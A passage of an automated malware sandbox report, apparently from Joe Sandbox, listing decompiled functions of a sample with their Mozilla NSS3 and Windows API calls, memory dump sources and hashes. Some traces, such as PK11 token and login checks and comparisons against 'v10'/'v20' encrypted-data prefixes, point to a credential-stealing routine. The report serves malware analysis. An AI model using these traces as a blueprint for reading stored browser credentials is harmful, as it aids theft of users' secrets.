                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1376842649-0
                                                                                                                                              • Opcode ID: d51b37329585c367415842e59d339389aaf5385f20894a7b709e35774ff087fd
                                                                                                                                              • Instruction ID: 1d05e2d45fcd1058a1801796126e90232c206cb5c062ce68c67d3861ef5a600b
                                                                                                                                              • Opcode Fuzzy Hash: d51b37329585c367415842e59d339389aaf5385f20894a7b709e35774ff087fd
                                                                                                                                              • Instruction Fuzzy Hash: 071106BAF00115B7EB111B359D0ACAA3AB9EB1225CB154170EC1883711FB22D868C7D2
                                                                                                                                              Function 6C709C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C7211C0: PR_NewLock.NSS3 ref: 6C721216
                                                                                                                                              • free.MOZGLUE(?), ref: 6C709E17
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C709E25
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C709E4E
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C709EA2
                                                                                                                                                • Part of subcall function 6C719500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C719546
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C709EB6
                                                                                                                                              • PR_Unlock.NSS3 ref: 6C709ED9
                                                                                                                                              • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C709F18
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3381623595-0
                                                                                                                                              • Opcode ID: 203d4b42c5953947a31484310a22cfa86b7c8ef7f95653eaf0cad0f44eb5c6d1
                                                                                                                                              • Instruction ID: 1c9cde160883964fe438bc514382091b018052660e36536e108538569f8cc270
                                                                                                                                              • Opcode Fuzzy Hash: 203d4b42c5953947a31484310a22cfa86b7c8ef7f95653eaf0cad0f44eb5c6d1
                                                                                                                                              • Instruction Fuzzy Hash: 7C81D5B2A04201ABE7109F34DE49AAB77E9BF6524CF184538EC5987F41FB31E918C791
                                                                                                                                              Function 6C71DCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(D958E852,6C721397,5B5F5EC0,?,?,6C71B1EE,2404110F,?,?), ref: 6C71AB3C
                                                                                                                                                • Part of subcall function 6C71AB10: free.MOZGLUE(D958E836,?,6C71B1EE,2404110F,?,?), ref: 6C71AB49
                                                                                                                                                • Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(5D5E6C91), ref: 6C71AB5C
                                                                                                                                                • Part of subcall function 6C71AB10: free.MOZGLUE(5D5E6C85), ref: 6C71AB63
                                                                                                                                                • Part of subcall function 6C71AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C71AB6F
                                                                                                                                                • Part of subcall function 6C71AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C71AB76
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C71DCFA
                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000), ref: 6C71DD0E
                                                                                                                                              • PK11_IsFriendly.NSS3(?), ref: 6C71DD73
                                                                                                                                              • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C71DD8B
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C71DE81
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C71DEA6
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C71DF08
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 519503562-0
                                                                                                                                              • Opcode ID: a2fc2ddf3890154efc5ccba583dea764f2cf54e7d2d658e6657dc368e6ca2f8f
                                                                                                                                              • Instruction ID: 5b7385d2e6f915d891f2435d8e46ca84084f02b914b44999ff150734bc3fda14
                                                                                                                                              • Opcode Fuzzy Hash: a2fc2ddf3890154efc5ccba583dea764f2cf54e7d2d658e6657dc368e6ca2f8f
                                                                                                                                              • Instruction Fuzzy Hash: A39102B5A041019FDB01CF68CA89BAAB7B5BF64309F194039DC189BF41E731E909CF95
                                                                                                                                              Function 6C6F2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __allrem
                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                              • API String ID: 2933888876-3221253098
                                                                                                                                              • Opcode ID: 606de43b3cb799db3e862f19d1c27b07cd4bd4cc9a47b8c6d44faf8251966c03
                                                                                                                                              • Instruction ID: 961276c8755fd98f512dc2d16875b5176b2ce984099a806ed161c6bed8072669
                                                                                                                                              • Opcode Fuzzy Hash: 606de43b3cb799db3e862f19d1c27b07cd4bd4cc9a47b8c6d44faf8251966c03
                                                                                                                                              • Instruction Fuzzy Hash: 8761B171A002059FDB54CF64DC98AAA77B2FF89318F20853CE9199B780DB34AD06CF95
                                                                                                                                              Function 0040A560 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 155memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040A5D2
                                                                                                                                              • memset.MSVCRT ref: 0040A60B
                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040A664
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmp$AllocLocallstrcpymemset
                                                                                                                                              • String ID: @$v10$v20
                                                                                                                                              • API String ID: 631489823-278772428
                                                                                                                                              • Opcode ID: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                                                                                                                              • Instruction ID: deead5598e30f73acd49a71965db0b9c26184f2a73657d717c04d8255e3e8135
                                                                                                                                              • Opcode Fuzzy Hash: 3de6848b35251bb0137415eef7a32c473c67b893c9d08e2ffe65091eb629360f
                                                                                                                                              • Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A
                                                                                                                                              Function 6C72BCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6C72BD1E
                                                                                                                                                • Part of subcall function 6C702F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C702F0A
                                                                                                                                                • Part of subcall function 6C702F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C702F1D
                                                                                                                                                • Part of subcall function 6C7457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C70B41E,00000000,00000000,?,00000000,?,6C70B41E,00000000,00000000,00000001,?), ref: 6C7457E0
                                                                                                                                                • Part of subcall function 6C7457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C745843
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C72BD8C
                                                                                                                                                • Part of subcall function 6C75FAB0: free.MOZGLUE(?,-00000001,?,?,6C6FF673,00000000,00000000), ref: 6C75FAC7
                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6C72BD9B
                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C72BDA9
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72BE3A
                                                                                                                                                • Part of subcall function 6C703E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C703EC2
                                                                                                                                                • Part of subcall function 6C703E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C703ED6
                                                                                                                                                • Part of subcall function 6C703E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C703EEE
                                                                                                                                                • Part of subcall function 6C703E60: PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C703F02
                                                                                                                                                • Part of subcall function 6C703E60: PL_FreeArenaPool.NSS3 ref: 6C703F14
                                                                                                                                                • Part of subcall function 6C703E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C703F27
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C72BE52
                                                                                                                                                • Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C702CDA,?,00000000), ref: 6C702E1E
                                                                                                                                                • Part of subcall function 6C702E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C702E33
                                                                                                                                                • Part of subcall function 6C702E00: TlsGetValue.KERNEL32 ref: 6C702E4E
                                                                                                                                                • Part of subcall function 6C702E00: EnterCriticalSection.KERNEL32(?), ref: 6C702E5E
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableLookup.NSS3(?), ref: 6C702E71
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableRemove.NSS3(?), ref: 6C702E84
                                                                                                                                                • Part of subcall function 6C702E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C702E96
                                                                                                                                                • Part of subcall function 6C702E00: PR_Unlock.NSS3 ref: 6C702EA9
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C72BE61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2178860483-0
                                                                                                                                              • Opcode ID: 6e680d0327f124372b2740a154854e5870e466e2dec643385fec0f90e35e14e0
                                                                                                                                              • Instruction ID: 11ec0c3baadfca77d048f58c219336514d1c718f25e7d798351de0c640296a6a
                                                                                                                                              • Opcode Fuzzy Hash: 6e680d0327f124372b2740a154854e5870e466e2dec643385fec0f90e35e14e0
                                                                                                                                              • Instruction Fuzzy Hash: 1A41E2B6E00210AFC710CF28DE89AAA77E8EB49718F144168F94997711E735FD14CB92
                                                                                                                                              Function 6C74AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C74AB3E,?,?,?), ref: 6C74AC35
                                                                                                                                                • Part of subcall function 6C72CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C72CF16
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C74AB3E,?,?,?), ref: 6C74AC55
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E,?,?), ref: 6C74AC70
                                                                                                                                                • Part of subcall function 6C72E300: TlsGetValue.KERNEL32 ref: 6C72E33C
                                                                                                                                                • Part of subcall function 6C72E300: EnterCriticalSection.KERNEL32(?), ref: 6C72E350
                                                                                                                                                • Part of subcall function 6C72E300: PR_Unlock.NSS3(?), ref: 6C72E5BC
                                                                                                                                                • Part of subcall function 6C72E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C72E5CA
                                                                                                                                                • Part of subcall function 6C72E300: TlsGetValue.KERNEL32 ref: 6C72E5F2
                                                                                                                                                • Part of subcall function 6C72E300: EnterCriticalSection.KERNEL32(?), ref: 6C72E606
                                                                                                                                                • Part of subcall function 6C72E300: PORT_Alloc_Util.NSS3(?), ref: 6C72E613
                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C74AC92
                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C74AB3E), ref: 6C74ACD7
                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C74AD10
                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C74AD2B
                                                                                                                                                • Part of subcall function 6C72F360: TlsGetValue.KERNEL32(00000000,?,6C74A904,?), ref: 6C72F38B
                                                                                                                                                • Part of subcall function 6C72F360: EnterCriticalSection.KERNEL32(?,?,?,6C74A904,?), ref: 6C72F3A0
                                                                                                                                                • Part of subcall function 6C72F360: PR_Unlock.NSS3(?,?,?,?,6C74A904,?), ref: 6C72F3D3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                              • Opcode ID: 4708270d9a28ecb508db0646dc25c3bb6a96295571ac9859e2aabdcd8e7be7d8
                                                                                                                                              • Instruction ID: 27b1e4b7d8ca9aee544729b6e4f4b12089f870e9f45213e812cbf0652b63da14
                                                                                                                                              • Opcode Fuzzy Hash: 4708270d9a28ecb508db0646dc25c3bb6a96295571ac9859e2aabdcd8e7be7d8
                                                                                                                                              • Instruction Fuzzy Hash: 23313BB1E002065FEB008F69CD499AF7776EF84728B18C138E8159BB41EB31DD1587A1
                                                                                                                                              Function 6C728C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_Now.NSS3 ref: 6C728C7C
                                                                                                                                                • Part of subcall function 6C7C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DC6
                                                                                                                                                • Part of subcall function 6C7C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C810A27), ref: 6C7C9DD1
                                                                                                                                                • Part of subcall function 6C7C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7C9DED
                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C728CB0
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C728CD1
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C728CE5
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C728D2E
                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C728D62
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C728D93
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                              • Opcode ID: 0303a34f6b5a55fa721d90b3d9caee49ff666b1e489548874b3be67fa1e1d6f6
                                                                                                                                              • Instruction ID: fbab5b84b39a18ccb87fb130d2b0edb5e3e24b499933c046e4013404dd7480b6
                                                                                                                                              • Opcode Fuzzy Hash: 0303a34f6b5a55fa721d90b3d9caee49ff666b1e489548874b3be67fa1e1d6f6
                                                                                                                                              • Instruction Fuzzy Hash: DD316A72E00201AFE7109F68CE497EA77B0BF59318F140236EA1967B90D776A958CBC1
                                                                                                                                              Function 6C769D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C769C5B), ref: 6C769D82
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C769C5B), ref: 6C769DA9
                                                                                                                                                • Part of subcall function 6C761340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76136A
                                                                                                                                                • Part of subcall function 6C761340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76137E
                                                                                                                                                • Part of subcall function 6C761340: PL_ArenaGrow.NSS3(?,6C6FF599,?,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?), ref: 6C7613CF
                                                                                                                                                • Part of subcall function 6C761340: PR_Unlock.NSS3(?,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C76145C
                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C769C5B), ref: 6C769DCE
                                                                                                                                                • Part of subcall function 6C761340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6FF599,?,00000000), ref: 6C7613F0
                                                                                                                                                • Part of subcall function 6C761340: PL_ArenaGrow.NSS3(?,6C6FF599,?,?,?,00000000,00000000,?,6C70895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C761445
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C769C5B), ref: 6C769DDC
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C769C5B), ref: 6C769DFE
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C769C5B), ref: 6C769E43
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C769C5B), ref: 6C769E91
                                                                                                                                                • Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF
                                                                                                                                                • Part of subcall function 6C761560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C75FAAB,00000000), ref: 6C76157E
                                                                                                                                                • Part of subcall function 6C761560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C75FAAB,00000000), ref: 6C761592
                                                                                                                                                • Part of subcall function 6C761560: memset.VCRUNTIME140(?,00000000,?), ref: 6C761600
                                                                                                                                                • Part of subcall function 6C761560: PL_ArenaRelease.NSS3(?,?), ref: 6C761620
                                                                                                                                                • Part of subcall function 6C761560: PR_Unlock.NSS3(?), ref: 6C761639
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                              • String ID:
